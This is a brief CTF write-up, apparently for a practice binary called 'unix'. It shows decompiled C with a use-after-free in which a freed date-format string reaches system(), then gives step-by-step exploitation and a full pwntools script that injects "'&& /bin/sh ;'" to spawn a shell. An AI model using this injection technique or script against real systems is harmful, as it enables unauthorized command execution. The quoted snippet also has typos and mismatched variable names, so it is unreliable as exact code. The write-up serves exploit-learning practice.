Time pls!
Ok this one was pretty simple it contained uaf bug .
The vuln code snippet ...
void set_foramt()
{
heap_ptr = strdup(str)
qmemcpy(&accept, "%aAbBcCdDeFgGhHIjklmNnNpPrRsStTuUVwWxXyYzZ:-_/0^# ", 0x33uLL);
if (strspn(s, &accept) == strlen(s))
{
qword_602118 = heap_ptr;
}
}
...
void set_zone()
{
heap_ptr = strdup(str)
}
void quit()
{
free(qword_602118)
free(qword_602120)
if( gets(s) == "Y")
{
exit(0)
}
}
void print()
{
snprintf(&command, 2048LL, 1LL, 2048LL, "/bin/date -d @%d +'%s'", dword_602120); <------- ptr used after free :)
system(&command)
}
So to exploit it
1) call set_format which malloc's our input and copies str with 'DUMMY'
2) now free the memory using quit and giving 'N' to avoid exiting
3) now use set_zone to allocate in our payload in same mem as format str
4) now call print to exeute command and we use shell escape and get the shell :)
from pwn import *
p = process("unix")
log.info(p.recvuntil('>'))
p.sendline("1")
log.info(p.recvuntil(':'))
p.sendline("AAAA")
log.info(p.recvuntil('>'))
p.sendline("5")
log.info(p.recvuntil('?'))
p.sendline("N")
log.info(p.recvuntil('>'))
p.sendline("3")
log.info(p.recvuntil(':'))
payload = "'&& /bin/sh ;'"
p.sendline(payload)
log.info(p.recvuntil('>'))
p.sendline("4")
p.interactive()